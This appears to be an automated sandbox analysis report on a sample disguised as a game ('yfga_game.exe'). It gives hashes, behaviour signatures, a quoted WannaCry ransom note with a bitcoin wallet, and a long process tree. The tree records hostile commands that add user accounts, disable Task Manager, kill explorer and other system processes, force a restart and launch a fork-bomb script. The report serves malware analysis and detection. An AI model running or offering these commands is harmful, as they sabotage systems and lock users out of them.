Resubmissions

15-07-2024 12:26

240715-pmah5stdrh 10

15-07-2024 12:01

240715-n64ewsyfjb 10

15-07-2024 11:54

240715-n278aaxhmd 10

15-07-2024 11:32

240715-nnry5sthpm 10

Analysis

  • max time kernel
    57s
  • max time network
    62s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    15-07-2024 11:54

General

  • Target

    yfga_game.exe

  • Size

    46.7MB

  • MD5

    9d846a2d794eb4614b3d0feaa6f83259

  • SHA1

    ff6d194172fa313b8921a80cecc84f470d8dc2d0

  • SHA256

    cfd64f9ed065d19f7c488db3a8e29a553c9e61849b1d08765006110d73d3434b

  • SHA512

    6a8115aa70bd1d0d0af474a2d9d5f4ad03e2fa09277a1f3f3e6063682329b1b42aeef206f4a74d2fb76cd12afe4daf0bd1571c26c7121741a782241d3d28b521

  • SSDEEP

    786432:c7Ud58tChs1g2uzRx7KPB8NUc3sXEPeEwkHYvgctIKpJZXnfsrQl92Z3tHDUOsj1:4t96L76B0HkGUvgcaKpDPBl92HHDdsGy

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Drops startup file 2 IoCs
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 37 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Delays execution with timeout.exe 4 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 54 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\yfga_game.exe
    "C:\Users\Admin\AppData\Local\Temp\yfga_game.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\YFGA.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\SysWOW64\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\IMPORTANT.txt
        3⤵
          PID:2740
        • C:\Windows\SysWOW64\net.exe
          net user "GO BACK!" "???" /add
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user "GO BACK!" "???" /add
            4⤵
              PID:2248
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskManager" /t REG_DWORD /d 1
            3⤵
              PID:2504
            • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\screenscrew.exe
              screenscrew.exe
              3⤵
              • Executes dropped EXE
              PID:1096
            • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\flasher.exe
              flasher.exe
              3⤵
              • Executes dropped EXE
              PID:620
            • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\calc.exe
              calc.exe
              3⤵
              • Executes dropped EXE
              PID:3052
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /K hydra.cmd
              3⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2188
              • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\jokewarehydra.exe
                jokewarehydra.exe
                4⤵
                • Executes dropped EXE
                PID:1820
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy3.vbs"
                4⤵
                  PID:1192
              • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\walliant.exe
                walliant.exe
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2244
                • C:\Users\Admin\AppData\Local\Temp\is-DV8I8.tmp\walliant.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-DV8I8.tmp\walliant.tmp" /SL5="$30180,4511977,830464,C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\walliant.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:1232
              • C:\Windows\SysWOW64\net.exe
                net user "FUCK OFF YFGA" "I DONT KNOW" /add
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2108
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 user "FUCK OFF YFGA" "I DONT KNOW" /add
                  4⤵
                    PID:2088
                • C:\Windows\SysWOW64\reg.exe
                  reg import reg.reg
                  3⤵
                  • Sets desktop wallpaper using registry
                  PID:1892
                • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\YouAreAnIdiot.exe
                  youareanidiot.exe
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:640
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 640 -s 876
                    4⤵
                    • Loads dropped DLL
                    • Program crash
                    PID:2164
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im fontdrvhost.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1576
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im TextInputhost.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1904
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im explorer.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1888
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 5
                  3⤵
                  • Delays execution with timeout.exe
                  PID:2492
                • C:\Windows\SysWOW64\shutdown.exe
                  shutdown /r /t 30000 /c "HAHA I HACKED YOU AYFGA ROCKS YOU"
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2964
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /K spam.bat "forkbomb" /min
                  3⤵
                    PID:2392
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                      4⤵
                        PID:928
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im taskmgr.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:800
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im regedit.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2348
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                        4⤵
                          PID:3068
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                          4⤵
                            PID:1648
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im taskmgr.exe
                            4⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1280
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im regedit.exe
                            4⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2064
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                            4⤵
                              PID:2836
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                              4⤵
                                PID:2920
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im taskmgr.exe
                                4⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2664
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im regedit.exe
                                4⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2640
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                4⤵
                                  PID:2316
                                • C:\Windows\SysWOW64\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                  4⤵
                                    PID:1772
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im taskmgr.exe
                                    4⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:828
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im regedit.exe
                                    4⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2928
                                  • C:\Windows\SysWOW64\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                    4⤵
                                      PID:2916
                                    • C:\Windows\SysWOW64\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                      4⤵
                                        PID:2924
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im taskmgr.exe
                                        4⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2196
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im regedit.exe
                                        4⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2408
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                        4⤵
                                          PID:1548
                                        • C:\Windows\SysWOW64\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                          4⤵
                                            PID:2396
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im taskmgr.exe
                                            4⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1684
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im regedit.exe
                                            4⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2004
                                          • C:\Windows\SysWOW64\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                            4⤵
                                              PID:2976
                                            • C:\Windows\SysWOW64\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                              4⤵
                                                PID:776
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im taskmgr.exe
                                                4⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:572
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im regedit.exe
                                                4⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:264
                                              • C:\Windows\SysWOW64\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                4⤵
                                                  PID:1836
                                                • C:\Windows\SysWOW64\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                  4⤵
                                                    PID:2800
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im taskmgr.exe
                                                    4⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2304
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im regedit.exe
                                                    4⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2716
                                                  • C:\Windows\SysWOW64\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                    4⤵
                                                      PID:2636
                                                    • C:\Windows\SysWOW64\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                      4⤵
                                                        PID:2248
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /f /im taskmgr.exe
                                                        4⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1692
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /f /im regedit.exe
                                                        4⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:888
                                                      • C:\Windows\SysWOW64\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                        4⤵
                                                          PID:1924
                                                        • C:\Windows\SysWOW64\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                          4⤵
                                                            PID:1020
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /f /im taskmgr.exe
                                                            4⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1256
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /f /im regedit.exe
                                                            4⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2980
                                                          • C:\Windows\SysWOW64\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                            4⤵
                                                              PID:1608
                                                            • C:\Windows\SysWOW64\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                              4⤵
                                                                PID:1676
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im taskmgr.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1160
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im regedit.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:584
                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                4⤵
                                                                  PID:1312
                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                  4⤵
                                                                    PID:572
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im taskmgr.exe
                                                                    4⤵
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2380
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im regedit.exe
                                                                    4⤵
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2344
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                    4⤵
                                                                      PID:1592
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                      4⤵
                                                                        PID:2632
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /f /im taskmgr.exe
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2844
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /f /im regedit.exe
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2668
                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                        4⤵
                                                                          PID:2108
                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                          4⤵
                                                                            PID:684
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im taskmgr.exe
                                                                            4⤵
                                                                            • Kills process with taskkill
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1992
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im regedit.exe
                                                                            4⤵
                                                                            • Kills process with taskkill
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2040
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                            4⤵
                                                                              PID:504
                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                              4⤵
                                                                                PID:2516
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im taskmgr.exe
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1684
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im regedit.exe
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1080
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                                4⤵
                                                                                  PID:800
                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                                  4⤵
                                                                                    PID:2996
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /f /im taskmgr.exe
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2572
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /f /im regedit.exe
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2736
                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                                    4⤵
                                                                                      PID:2060
                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                                      4⤵
                                                                                        PID:828
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /f /im taskmgr.exe
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:892
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /f /im regedit.exe
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2200
                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                                        4⤵
                                                                                          PID:1840
                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                                          4⤵
                                                                                            PID:1684
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /f /im taskmgr.exe
                                                                                            4⤵
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:936
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /f /im regedit.exe
                                                                                            4⤵
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1724
                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                                            4⤵
                                                                                              PID:456
                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                                              4⤵
                                                                                                PID:2860
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /f /im taskmgr.exe
                                                                                                4⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2628
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /f /im regedit.exe
                                                                                                4⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3056
                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                                                4⤵
                                                                                                  PID:1584
                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                                                  4⤵
                                                                                                    PID:3004
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /f /im taskmgr.exe
                                                                                                    4⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1996
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /f /im regedit.exe
                                                                                                    4⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2276
                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                                                    4⤵
                                                                                                      PID:2560
                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                                                      4⤵
                                                                                                        PID:1632
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /f /im taskmgr.exe
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2808
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /f /im regedit.exe
                                                                                                        4⤵
                                                                                                        • Kills process with taskkill
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2776
                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                                                        4⤵
                                                                                                          PID:1764
                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                                                          4⤵
                                                                                                            PID:1872
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /f /im taskmgr.exe
                                                                                                            4⤵
                                                                                                            • Kills process with taskkill
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2176
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /f /im regedit.exe
                                                                                                            4⤵
                                                                                                            • Kills process with taskkill
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2776
                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"
                                                                                                            4⤵
                                                                                                              PID:2196
                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"
                                                                                                              4⤵
                                                                                                                PID:2268
